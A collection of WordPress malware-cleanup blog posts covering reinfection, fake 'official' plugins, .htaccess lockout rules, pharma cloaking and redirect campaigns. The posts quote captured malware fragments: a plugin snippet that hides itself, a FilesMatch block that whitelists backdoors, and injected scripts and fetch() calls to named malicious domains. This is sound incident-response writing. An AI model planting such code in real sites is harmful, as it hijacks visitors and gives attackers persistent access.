Category: Website Security

Is your WordPress site stuck in a nightmare loop?

You scan the site, delete the infected files, and see the “All Clean” green checkmark. You think the battle is won. But then—often exactly at midnight or 24 hours later—the malware is back. The redirects start again. The hosting provider suspends your account.

This is the “Reinfection Loop,” and it is the single most frustrating problem for website owners.

I have cleaned thousands of hacked sites, and here is the hard truth: If your site keeps getting reinfected, you didn’t miss a file. You missed a mechanism.

Scanners like Wordfence or Sucuri are great tools, but they often miss “smart” malware that hides in the database, disguises itself as a legitimate plugin, or lives inside your cron jobs.

In this guide, I will show you exactly where the infection is hiding and how to break the cycle permanently.

🔑 Key Points: Why “Clean” Sites Get Hacked Again

• Scanners have blind spots: Most scanners look for known malware signatures. If a hacker writes a custom backdoor, the scanner sees it as “safe” code.
• The “Time Bomb” effect: Hackers use Cron Jobs to schedule a re-download of the virus. You delete the virus file, but the “alarm clock” (Cron) is still ticking.
• Hidden Entrances: Backdoors are often hidden in innocent-looking files like images (.jpg, .gif) or fake plugin folders.

Reason 1: The “Green Scan” Lie (Why Scanners Fail)

The biggest mistake I see clients make is trusting the “Green Shield.” You run a scan, it says “No Malware Found,” so you assume the site is safe.

Here is why that is dangerous.

Sophisticated malware developers know exactly how security plugins work. They write code that looks legitimate. For example, I recently analyzed a site where the malware was hiding inside a plugin that looked like a “compatiblity fix.” It was called wp-compat, and it had a backdoor that allowed the hacker to upload files whenever they wanted.

Read more: The wp-compat Plugin: The Hidden Backdoor in Your WordPress Site

Because the folder name looked “boring” and technical, the site owner ignored it. The scanner ignored it too, because the code inside used standard PHP functions—just used maliciously.

The “Official Plugin” Trick

Another common tactic is creating folders that sound like they belong to WordPress or popular plugins. I have seen malware hide in folders named wp-security-team or wordpress-core-update.

If you see a plugin in your file manager (cPanel) that does not appear in your WordPress Dashboard plugin list, it is almost certainly malware.

Read more: New Malware Alert: The Fake “Official” Plugin Attack

Reason 2: The “Midnight” Reinfection (Cron Jobs)

Does your malware come back at a specific time? Maybe every day at 12:00 AM or every 6 hours?

This is a classic sign of a Cron Job Hack.

WordPress has a built-in scheduling system called WP-Cron. It handles scheduled posts and update checks. Hackers love this feature. They inject a tiny line of code into your database that says:

“Every day at 00:00, go to this external URL, download the virus, and reinstall it.”

You can delete every malicious file on your server, but if you don’t delete this instruction from the database, the site will re-infect itself automatically. This is why you feel like you are chasing a ghost.

Read more: Why Malware Keeps Coming Back: Hidden Cron Job Hack Explained

Reason 3: Ghost Admins and Hidden Users

Sometimes, the “virus” isn’t a file at all. It’s a person.

When hackers break in, the first thing they do is create a backup Admin user for themselves. But they are smart—they add a snippet of code to functions.php that tells WordPress: “Do not show this user in the Users list.”

You look at your “Users” page, and you see only yourself. Meanwhile, the hacker logs in every night using their hidden account to re-upload the malware you just deleted.

To catch this, you cannot rely on the WordPress dashboard. You must look at the wp_users table in your database (using phpMyAdmin) or use a deep-scan method.

Read more: How to Find and Remove Hidden Admin Users in WordPress

Reason 4: Malware Hiding in Images (.jpg, .gif, .ico)

You might think, “It’s just a picture, it can’t hurt me.”

Wrong.

One of the sneakiest reinfection methods involves hiding PHP code inside image files. The hacker uploads a file named logo.jpg. If you open it, it looks like a blurry image or just code gibberish. But the server is tricked into treating this “image” as an executable program.

I recently found a backdoor hidden inside a .gif file. The scanner skipped it because scanners are configured to skip media files to save speed. This left a permanent open door for the hacker.

Read more: Can a JPG File Contain Malware? Uncovering the Fake Image Backdoor
Read more: The Hidden Threat: How Malware Hides in GIF Files

Reason 5: The .htaccess Redirection Trap

If your site is redirecting to gambling or pharmaceutical sites (especially on mobile devices), the problem is usually in your .htaccess file.

This file controls how your server directs traffic. Hackers inject rules here that say: “If the visitor is coming from Google, send them to getfix.win.”

The tricky part? They often add 500 lines of “white space” before the malicious code. When you open the file to check it, it looks empty or normal at the top. You have to scroll all the way down to find the virus.

Read more: The Ultimate Guide to Removing .htaccess Malware

The Step-by-Step “Deep Clean” Strategy

If you are tired of the reinfection loop, stop doing “quick scans.” You need a surgical removal process. Here is the checklist I use for my clients.

Step 1: Manual File Inspection

Don’t just rely on plugins. Log into your hosting via FTP or File Manager.

1. Go to wp-content/plugins. Open every folder. Do you recognize all of them? If you see wp-security-patch or wp-z-compat, delete them.
2. Go to wp-content/uploads. Look for any PHP files hiding in your year/month folders. Uploads should never contain PHP files.

Read more: Hidden Backdoors & Fake Plugins: How Hackers Live in Dashboard

Step 2: Clean the Database

Malware strings often hide in the wp_options table (especially the siteurl or home rows if you have redirects).

1. Open phpMyAdmin.
2. Search for <script> or eval( or base64.
3. Check specifically for executable files that shouldn’t be there.

Read more: Removing Hidden Executable Files (Case Study)

Step 3: Check Core Files (functions.php & wp-config.php)

The functions.php file in your active theme is the #1 spot for “Ghost Admin” code. Open it and look for strange code at the very top or very bottom.

Also, check wp-config.php. Hackers sometimes modify this file to point to a different database or include a malicious file before WordPress even loads.

Read more: Found Suspicious Code in functions.php? The Ghost Admin Hack

Step 4: The “Nuclear” Option (Fresh Core Install)

If you can’t find the file, replace the system.

1. Download a fresh ZIP from WordPress.org.
2. Delete wp-admin and wp-includes from your server.
3. Upload the fresh copies.

Note: Do not delete wp-content or wp-config.php.

Post-Cleanup: How to Lock the Door

Cleaning the malware is only 50% of the job. You must close the holes they used to get in.

1. Change Your Salts

WordPress uses “Salts” to encrypt login cookies. If a hacker has a valid cookie, they can stay logged in even if you change your password. You must update your Security Keys in wp-config.php to force-logout everyone (including the hacker).

2. Update Everything

A vulnerable plugin is an open window. If you are running an old version of Elementor or a shady “nulled” theme, you will be hacked again in 24 hours.

3. Setup Backups (Off-Site)

If this happens again, you need a clean version to revert to. Do not store backups on the same server! Use a tool like UpdraftPlus to send backups to Google Drive or Dropbox.

Read more: How to Back Up Your WordPress Site with UpdraftPlus (2025 Guide)

4. Checklist Review

I have compiled a complete 60-point checklist of signs that your site is still infected. Go through this list one by one.

Read more: 60 Clear Signs Your WordPress Site is Hacked
Read more: What to Do After Fixing a Hacked Site (Real Cleanup Checklist)

FAQ: Questions My Clients Always Ask

Q: Why does malware come back every day at the same time?

A: This is almost certainly a Cron Job or a scheduled external script hitting your site. The malware isn’t “living” on your site; it is being “re-delivered” by a script. Check your Cron events immediately.

Q: Can a “Factory Reset” remove malware?

A: Yes and no. If you reset the files but keep the database, the infection (which often lives in the database) will survive. You must clean both files and the database.

Q: Why didn’t Wordfence/Sucuri detect it?

A: Scanners look for “Signatures” (fingerprints). If the hacker wrote a brand new, custom piece of code (like the Fake Security Team Malware), it has no fingerprint yet. Scanners are helpful, but they are not human.

Q: Is it safe to use “Nulled” plugins?

A: Never. 99% of “free pro plugins” contain pre-installed backdoors. This is the #1 cause of reinfection.

Still Can’t Stop the Reinfection?

If you have followed this guide, checked the cron jobs, replaced the core files, and the malware still comes back, you likely have a “root level” infection or a complex database injection.

Some malware is designed to be impossible to remove without reading the raw code logs. If you are losing money every minute your site is down, you might need a specialist to dig deeper than a plugin can.

Read my case study: I Found a Hidden Backdoor in a Client’s Site (Real Story)

Don’t let hackers win. Be thorough, be paranoid, and check every single file.

If you are reading this, you likely found a strange folder in your wp-content/plugins directory with a name that sounds technically impressive but meaningless—something like wp-kludge-allow, wp-analyzer-philosophy, or wp-systematize-marketplace.

You might be wondering: “Did I install this? Is it a core WordPress file?”

The answer is no. You are looking at a sophisticated piece of malware designed to impersonate an official WordPress component. We call this the “Fake Official” Plugin Attack.

Here is a breakdown of what this malware does, why it is dangerous, and how to remove it.

The Disguise: “Official WordPress Plugin”

Most WordPress malware tries to be invisible. This variant takes a different approach: Audacity.

If you open the main PHP file inside one of these folders (e.g., wp-kludge-allow/index.php), you will see a file header that looks legitimate:

/*
Plugin Name: WP Kludge Allow
Description: Official WordPress plugin
Author: WordPress
Version: 12.7.0
*/

The attackers explicitly label it as an “Official WordPress plugin” authored by “WordPress”. They even assign it a high version number (like 12.7.0) to make it appear stable and essential.

This is a Social Engineering tactic. The goal is to make a developer or site owner hesitate before deleting it, fearing they might break the site by removing a “core” feature.

How It Works: The “Invisible” Plugin

You might ask, “If this is a plugin, why didn’t I see it in my dashboard?”

This is the malware’s primary trick. It contains specific code designed to scrub its own existence from your WordPress admin panel while still running in the background.

1. Ghost Mode (Hiding from the Dashboard)

The malware hooks into the pre_current_active_plugins action. Just before WordPress displays your plugin list, the malware runs a function (often named rhi_cbx or similar) that finds its own filename in the list and unsets it.

// Malware code that removes itself from the list table
if (in_array($key, $h)) {
    unset($wp_list_table->items[$key]);
}

This ensures that even though the plugin is active, it is completely invisible on the Plugins > Installed Plugins page.

2. The Backdoor (Direct Access)

This malware has a “split personality” controlled by a simple check: if (defined('ABSPATH')).

• If loaded by WordPress: It hides itself and stays dormant to avoid detection.
• If loaded directly (by a hacker): It executes a malicious payload.

If a hacker accesses the file directly in a browser (e.g., yoursite.com/wp-content/plugins/wp-kludge-allow/index.php), the script bypasses WordPress security and runs an obfuscated function named fif.

In the samples we analyzed, this function often decodes a string to point to your .htaccess file and attempts to include it. This suggests the attackers have hidden malicious PHP code inside your .htaccess file, using this “plugin” as the trigger to execute it.

Indicators of Compromise

Check your /wp-content/plugins/ directory via FTP or your hosting File Manager. If you see folders with generated “nonsense” names, your site is likely infected. Common names seen in this attack wave include:

• wp-kludge-allow
• wp-analyzer-philosophy
• wp-systematize-marketplace
• wp-plugin-hostgator (mimicking legitimate hosting tools)

How to Fix It

1. Delete the Folders: These are not core files. You can safely delete the entire folder (e.g., wp-kludge-allow).
2. Check Your .htaccess: Since the malware attempts to load this file, check your root .htaccess file for hidden PHP code or malicious directives.
3. Scan for Others: This malware often drops multiple copies with different names. Ensure you check all folders in your plugins directory.
4. Change Passwords: As with any compromise, reset all admin passwords and salt keys immediately.

Have you found a folder with a different name that follows this pattern? Drop the name in the comments below to help others identify this malware.

Malware infections on shared hosting can spread like wildfire. We recently tackled a massive infection on a Bluehost cPanel account where the scanner lit up with over 1,162 infected files.

The culprit? A malicious code injection inside the .htaccess file that replicated itself across every single directory—including the trash.

Here is a deep dive into this specific “Lockout” malware, how it works, and the single command line trick we used to delete all 1,162 infections in seconds.

The Symptoms: “403 Forbidden” and Massive Scan Results

The client approached us after their site started throwing errors and their hosting account was flagged. Upon running a server-side scan, the results were alarming:

As you can see in the scan log above, the infection wasn’t just in the public HTML folder. It had spread to:

• Theme directories (/Divi/includes/...)
• Image folders
• The Trash Folder: A significant number of infections were found in /.trash/, meaning even “deleted” files were harboring the virus.

Analyzing the Malware Code

Unlike some malware that redirects traffic or injects ads, this specific hack is designed to lock the site owner out while maintaining a secret backdoor for the hacker.

Here is the code we found inside the infected files:

<FilesMatch ".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|lock360.php|wp-l0gin.php|wp-the1me.php|wp-scr1pts.php|wp-admin.php|radio.php|content.php|about.php|wp-login.php|admin.php|mah.php|jp.php|ext.php)$">
Order allow,deny
Allow from all
</FilesMatch>

The “Lockout” Strategy:

1. Blocks All PHP Execution: The first block stops virtually every PHP script on your site from running. This is why legitimate plugins or themes break immediately.
2. Whitelists the Backdoors: The second block explicitly allows specific files to run. While some look normal (index.php, wp-login.php), others are 100% malicious backdoors:
   • lock360.php
   • wp-l0gin.php (Notice the zero instead of an ‘o’)
   • wp-the1me.php
   • mah.php

The Fix: How to Delete 1,162 Files in 5 Seconds

Manually deleting 1,162 files via FTP would take hours. Since this malware infected every .htaccess file in the directory, the fastest solution was the “Nuclear Option”: Delete them all and regenerate the clean ones.

We used the cPanel Terminal (available on Bluehost) to run a powerful find-and-delete command.

The Command We Used:

What this command does:

• find . : Starts searching in the current directory (public_html).
• -name .htaccess : Looks for any file named exactly “.htaccess”.
• -delete : Instantly deletes every match it finds.

Final Cleanup Steps

Once the malicious .htaccess files were gone, the site became accessible again. However, we still had to remove the actual backdoor files listed in the hacker’s whitelist.

We ran a search for the following filenames and deleted them:

• lock360.php
• wp-l0gin.php
• wp-the1me.php
• wp-scr1pts.php
• radio.php

Is Your Bluehost Site Suspended?

If you see a “FilesMatch” error or have found thousands of infected files on your server, do not panic. We specialize in cleaning massive cPanel infections without losing your data.

Contact Us for Instant Malware Removal

If you have noticed your WordPress site ranking for keywords like “Viagra,” “Cialis,” or other pharmaceutical terms—but the site looks completely normal when you visit it—you are likely the victim of a Cloaking Attack.

We recently cleaned a client site infected with a specific variant of this malware that hides inside a file named settings-functions.php. Here is a breakdown of how this malware works, how we found it, and how to get rid of it.

The Symptoms: “Pharma” Scams and Hidden Files

Our client reported that their site was being flagged for “pharmaceutical scams,” yet they couldn’t see any spam ads on the homepage. Using our security scanners, we identified a malicious file hidden deep within the active theme folder (in this case, Hello Elementor):

wp-content/themes/hello-elementor/includes/settings-functions.php

While the file name sounds legitimate, the code inside was a sophisticated backdoor designed to hijack the website’s search engine rankings.

Analyzing the Malware: The “SimpleCache” Class

This malware is clever. It masquerades as a caching plugin to avoid detection by less experienced developers.

1. The Obfuscation (Class _keys)

The top of the file contains a class called _keys. This is a decoder. The malware uses base64 encoding and XOR encryption to hide its true intent.

If you look at the code, you will see strings like _keys::_dekr('_0', '_'.'1'). This translates scrambled nonsense into readable commands, allowing the hackers to hide keywords like “Viagra” or malicious URLs from simple text searches.

2. The “SimpleCache” Disguise

The main payload is wrapped in a class named SimpleCache. It even includes fake documentation comments claiming to handle “caching functionality” to trick site owners into thinking it is a necessary file.

3. SEO Cloaking (The “Checkbot” Function)

The most dangerous part of this code is the public function checkbot().

This function checks the “User Agent” of the visitor. If the visitor is a real person, the site loads normally. However, if the visitor is Googlebot, Bingbot, or Yahoo, the malware:

• Intercepts the request.
• Fetches spam content from a remote server (using the httpGet function).
• Injects that spam into your pages.

This is why your SEO tanks while the site looks fine to you. Google is indexing the spam the malware serves it.

4. Database Infection

Unlike simple viruses that just sit in files, this malware creates its own tables in your WordPress database to store spam links and configurations. In the code, we can see it initializing tables for cache, settings, and tasks.

How to Remove the “SimpleCache” Pharma Hack

Step 1: Locate and Delete the File

Check your active theme folder (wp-content/themes/your-theme-name/). Look for suspicious files like:

• settings-functions.php
• class.cache.php
• db-cache.php

If you open the file and see class _keys or class SimpleCache with scrambled text at the top, delete the file immediately.

Step 2: Check functions.php

The malware needs to be “loaded” to work. Check your theme’s functions.php file. Look for a line that includes or requires the file you just deleted (e.g., require_once('includes/settings-functions.php');). Remove that line.

Step 3: Clean the Database

This specific malware creates extra tables in your database that often share your table prefix (e.g., wp_). Log into phpMyAdmin and look for suspicious tables that are not part of WordPress Core or your plugins. They might be named something like:

• wp_sc_cache
• wp_sc_settings
• wp_sc_tasks

Always backup your database before dropping tables.

Step 4: Resubmit to Google

Once the files are gone and the database is clean, go to Google Search Console and request a re-indexing of your site. It may take a few weeks for the “Pharma” descriptions to disappear from search results.

Need Help Cleaning Your Site?

Malware like SimpleCache often creates backdoors in multiple locations. If you delete one file, it might regenerate itself the next day.

Hire us to completely clean your WordPress site and restore your SEO.

You open your website, and for a split second, it looks normal. Then, the screen flashes, and you are suddenly redirected to a spam site asking you to “Click Allow to Verify You Are Not a Robot” or forcing a download for “Play and Learn” apps.

You check your plugins. You check your settings. Everything looks fine.

The problem isn’t a setting—it is a sophisticated piece of malware hiding inside your website’s most critical files: header.php, footer.php, or even the core index.php.

This guide covers the “File-Based” variant of the simplecopseholding.com malware, which we are seeing spike this week.

The Symptoms: “Secret” Redirects

This malware is designed to be invisible to you (the site owner). It uses cookies and “User-Agent” detection to hide from logged-in administrators.

• Admins: See a normal site.
• Visitors (especially on mobile): Are redirected to scam domains like secretplans.discoveryment.my.id, exovandria.shop, or simplecopseholding.com.

The Code: What to Look For

Unlike the database variant we discussed previously, this version injects itself directly into your theme files.

Based on recent scans, the code looks like a harmless font loader or a performance optimization script. Do not be fooled.

Look for this specific block in your code:

<script>
(function() {
    var wf = document.createElement('script');
    wf.src = 'https://ajax.googleapis.com/ajax/libs/webfont/1.5.3/webfont.js'; 
    wf.type = 'text/javascript';
    wf.async = 'true';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(wf, s);
})();
</script>
<link rel='dns-prefetch' href='//simplecopseholding.com' />

Why this is dangerous:

1. The Decoy: It loads a legitimate webfont.js from Google to look “safe” to security scanners.
2. The Payload: The dns-prefetch tag for simplecopseholding.com is the red flag. It tells the browser to secretly prepare a connection to the hacker’s server, which then triggers the redirect.

How to Remove the Malware (File-by-File)

You need to check four specific locations where this malware loves to hide.

1. Check header.php (Most Common)

This file runs on every single page of your site.

• How to fix: Go to Appearance > Theme File Editor and select Theme Header (header.php).
• What to do: Look for the code block shown above, usually right before the </head> tag. Delete the script and the dns-prefetch line.

2. Check functions.php (The “Persisting” Infection)

If you delete the code from the header but it comes back instantly, it is hiding in your functions.php.

• The Trick: The malware adds a “hook” (like wp_head) that automatically writes the virus back into your pages every time they load.
• What to do: Open functions.php. Look for strange functions with random names (e.g., function x8s7_load_fonts()) that contain wp_head. If you see simplecopseholding inside, delete the entire function.

3. Check footer.php

Hackers know people check the header, so they sometimes move the code to the very bottom.

• What to do: Open Theme Footer (footer.php) and check just before the </body> tag.

4. Check the Core index.php

If the redirect happens even when you switch themes, the malware is in the root of your WordPress installation.

• Action: Connect via FTP/File Manager. Open the index.php file in your main folder.
• Normal WordPress index.php: It should only be about 2-3 lines of code.
• Infected index.php: If you see a giant wall of JavaScript code at the top of this file, delete the malicious code immediately.

Why Does It Keep Coming Back?

If you clean these files and the virus returns within minutes, you likely have a Backdoor File elsewhere on your server that is “healing” the virus.

Common backdoor filenames we’ve seen with this attack:

• wp-content/themes/your-theme/db.php
• wp-includes/css/style.php
• wp-admin/user-login.php

Can’t Find the Code?

This malware is known for “obfuscation” (scrambling its code to look like random letters). If you are seeing the redirect but can’t find the file responsible, I can manually trace the infection source and remove the backdoor preventing re-infection.

FAQs

What is the “Play and Learn” redirect?
This is a subscription scam. The malware redirects mobile users to a page that tries to trick them into subscribing to a daily paid service (e.g., “5.05 BDT Validity 1 Days”).

Why does my site say “Dangerous” in Chrome?
Google Safe Browsing detects the redirect pattern. Once flagged, visitors will see a big red warning screen. You must remove the malware and request a review in Google Search Console to clear this.

Is it safe to just restore a backup?
Maybe, but be careful. If your backup is from 3 days ago, but the hacker installed the backdoor 2 weeks ago, you will just be restoring the virus. It is safer to clean the current files.

Most WordPress malware hides in your files—fake plugins, backdoor scripts, or modified themes. But what happens when you scan your files, everything looks clean, yet your site is still leaking data or loading spam?

You are likely the victim of a Database Content Injection.

We recently uncovered a sophisticated attack targeting the wp_posts table directly. Instead of uploading a virus, hackers are editing your existing pages and posts to inject malicious JavaScript.

If you are seeing requests to sengatanlebah.shop or jasabacklink.buzz in your network tab, or if your page builder content looks “broken” in the backend, this guide is for you.

The Symptoms: What Does This Malware Do?

This malware is subtle. Unlike a redirect hack that sends users away immediately, this script runs silently in the background.

Based on our analysis of infected sites, the malware injects a fetch() command. This command forces your visitor’s browser to reach out to a 3rd-party server, download a text file (often containing spam links or ads), and insert it into your webpage.

The Malicious Domains to Watch For:

• sengatanlebah.shop
• jasabacklink.buzz

The Evidence: Deconstructing the Code

We found this infection hiding inside the content of a homepage using the Divi Page Builder. Here is the exact code block you need to look for:

<script>
    fetch('https://sengatanlebah.shop/back.js').then((resp) => resp.text()).then(y => document.getElementById("datax").innerHTML=y);
    fetch('https://jasabacklink.buzz/backlink/sigma.js').then((resp) => resp.text()).then(y => document.getElementById("info1").innerHTML=y);
    fetch('https://jasabacklink.buzz/backlink/teratai.js').then((resp) => resp.text()).then(y => document.getElementById("info2").innerHTML=y);
</script>

The hacker wraps this script inside valid page builder shortcodes (like [et_pb_code]) to ensure it executes on the frontend while remaining hidden in the Visual Editor.

How to Detect & Remove It (3 Methods)

Because this malware lives in your wp_posts table, file scanners like Wordfence often miss it. You have to search the database directly.

Method 1: The “Search & Replace” Plugin (Easiest)

If you aren’t comfortable with code, this is the safest route.

1. Install the plugin Better Search Replace.
2. Go to Tools > Better Search Replace.
3. In the “Search for” box, enter just the domain: sengatanlebah.shop.
4. Select your wp_posts table.
5. Run a Dry Run first to see how many pages are infected.
6. If it finds matches, you can locate those specific pages in your WordPress Dashboard and delete the code manually, or run the replacement to remove it automatically.

Method 2: Manual Cleanup via phpMyAdmin

If you want to see exactly what you are deleting:

1. Log in to your hosting control panel and open phpMyAdmin.
2. Select your website’s database.
3. Click the Search tab at the top.
4. Search for: jasabacklink
5. Select the wp_posts table and click Go.
6. Click Edit on any row that appears.
7. Look inside the post_content box for the <script> tags shown above and delete them.

Method 3: The Developer Way (SQL Command)

If you are a developer or comfortable with SQL, you can surgically remove the malware from the database using a query. This is the fastest way to clean huge sites with hundreds of infected posts.

Step 1: Verify the Infection
Run this query to find the infected rows:

SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%sengatanlebah%';

Step 2: Nuke the Malware
Once you have confirmed the pattern, use the REPLACE() function to swap the malicious domain with an empty string or a safe comment. (Note: Be extremely careful with exact string matching).

-- Example: This replaces the domain with "REMOVED_MALWARE" to break the script safely
UPDATE wp_posts 
SET post_content = REPLACE(post_content, 'sengatanlebah.shop', 'REMOVED_MALWARE') 
WHERE post_content LIKE '%sengatanlebah.shop%';

After running this, the script will fail to load. You can then go back and strip the broken script tags at your leisure without the site being actively infected.

How Did It Get In?

Finding malware inside wp_posts typically points to one of two vulnerabilities:

• Compromised Admin Account: A hacker guessed a password and edited the pages using the WordPress editor.
• SQL Injection: A vulnerable plugin allowed an attacker to write data directly to your database without logging in.

Final Security Hardening

1. Rotate Database Passwords: Change the DB user password in cPanel and update wp-config.php.
2. Check User Roles: Delete any unknown Administrator accounts.
3. Limit Login Attempts: Install a security plugin to block brute-force attacks.

Need Help Cleaning the Database?

Touching the database is risky. If you are uncomfortable running SQL queries or if the malware keeps coming back after you delete it, I can handle the cleanup for you safely.

FAQs

What is jasabacklink.buzz?
It is a domain associated with “Black Hat SEO.” Hackers inject scripts from this domain into compromised websites to generate fake backlinks or display spam.

Will deleting the script break my site?
No. This script is external malware. It has no function for your legitimate website. Removing the <script> tag and the fetch() code inside it will restore your site to normal.

Why didn’t my security plugin find this?
Most security plugins focus on scanning files (like .php and .js) on the server. This specific malware lives inside the content of your posts (the database), which many scanners ignore by default to save performance.

If you are reading this, you are likely panicking because your WordPress site—or your client’s site—is suddenly redirecting users to a spammy domain like simplecopseholding.com or getfix.win.

You might have already scanned the site with a security plugin and found nothing, yet the redirect persists.

This particular malware is part of the SocGholish / FakeUpdate family. It is nasty because it doesn’t just “break” your site; it silently injects code that waits for specific visitors (often from search engines) before hijacking their browser.

Here is exactly what simplecopseholding.com is, how to find it in your code (even when it hides), and how to remove it for good.

What is Simplecopseholding.com?

Simplecopseholding.com is a malicious domain used by hackers to deliver payloads to unsuspecting visitors.

When infected, your website loads a script from this domain. This script acts as a traffic controller:

• It checks the visitor: Is it a real human? Are they on a mobile device?
• It executes the redirect: If the victim matches the criteria, they are forcibly redirected to scam sites selling fake software, crypto schemes, or illegal products.
• It hides: If you (the admin) visit the site, the code often stays dormant, making you think everything is fine.

The Smoking Gun: What the Infection Looks Like

Unlike some hacks that delete files, this malware injects itself into your legitimate files. Based on recent cleanups, here is the signature you need to look for.

Open your website’s source code (Right-click > View Page Source) and search for simplecopseholding. You will likely see a dns-prefetch tag or a script tag looking exactly like this:

<script id="hexagoncontrail-js" src="https://simplecopseholding.com/jWcTAonomVveWlRkcUjN6PF-aopGXJy" type="text/javascript"></script>
<link rel='dns-prefetch' href='//simplecopseholding.com' />

(Above: The malicious “hexagoncontrail” script injecting the redirect.)

If you see dns-prefetch href='//simplecopseholding.com', your site is definitely infected.

How to Find & Remove the Malware (3 Methods)

Because this malware obfuscates (hides) itself inside your database or legitimate plugins, standard scans sometimes miss it. Use these methods in order.

Method 1: The “High Sensitivity” Wordfence Scan

If you already have Wordfence installed, it might have missed the infection because the standard scan is designed to be fast, not deep.

1. Go to Wordfence > All Options.
2. Scroll to General Options and check “Scan core files against repository versions”.
3. Check “Scan theme and plugin files against repository versions”.
4. Set “Scan sensitivity” to High Sensitivity.
5. Run a new scan.

If Wordfence finds a “Modified Core File” or an unknown file in wp-content/plugins, check the code manually before deleting. If you see the domain simplecopseholding inside, delete the file immediately.

Method 2: The Terminal “Grep” Search (For Developers)

If you have SSH access, this is the fastest way to find the hidden code. The malware often hides in header.php, footer.php, or random .js files.

Run this command inside your public_html folder to search for the domain:

grep -r "simplecopseholding" .

If that returns no results, search for the script ID often associated with this campaign:

grep -r "hexagoncontrail" .

• Result: The terminal will show you the exact file path (e.g., ./wp-content/themes/astra/header.php) where the hacker injected the line.
• Fix: Open that file via FTP or File Manager and delete only the malicious line.

Method 3: The “Download & Search” Technique (Failsafe)

If you can’t use SSH and the scanner failed:

1. Connect to your site via FTP (FileZilla).
2. Download your entire wp-content folder to your computer.
3. Open the folder in VS Code (a free code editor).
4. Press Ctrl + Shift + F (Global Search).
5. Search for simplecopseholding.
6. VS Code will scan every single file and show you exactly where the virus is hiding.

Checking the Database

Sometimes, the malware isn’t in a file—it’s injected directly into your database options (specifically into the wp_head hook).

1. Install a plugin like “Better Search Replace” (do not run a replace yet!).
2. Run a “Search” for simplecopseholding.
3. If it finds matches in the wp_options table, you will need to edit that row in phpMyAdmin and remove the script tag.

Post-Cleanup Checklist

Once the code is gone, you aren’t safe yet. The hacker likely left a “backdoor” to get back in.

• Change all Admin Passwords: Log everyone out and force a password reset.
• Update Everything: Old plugins are the #1 entry point for this infection.
• Check for “Ghost” Admins: Go to your Users tab. Do you see any admins you don’t recognize? (Look for names like adminbackup or wp-support). Delete them.
• Resubmit to Google: If Google flagged your site as “Dangerous,” go to Search Console and request a review once the clean-up is done.

Need Emergency Help?

Removing simplecopseholding.com redirects can be tricky because if you delete the wrong line of code, you can crash your site. If you’ve tried these steps and the redirect is still happening, or if you want a professional to ensure the backdoor is truly closed, I can help.

FAQs

Why is my site redirecting only on mobile?

This malware is “smart.” It detects the User-Agent of the visitor. It often ignores desktop users and logged-in admins to stay hidden longer, while aggressively redirecting mobile visitors to maximize scam revenue.

Is simplecopseholding.com a virus?

It is a domain used by a virus (specifically the SocGholish malware family). It serves the malicious JavaScript that hijacks your visitors’ browsers.

Will this hurt my SEO?

Yes. Google will eventually blacklist your site, showing a bright red “Deceptive Site Ahead” warning to users. You must remove the malware immediately to preserve your rankings.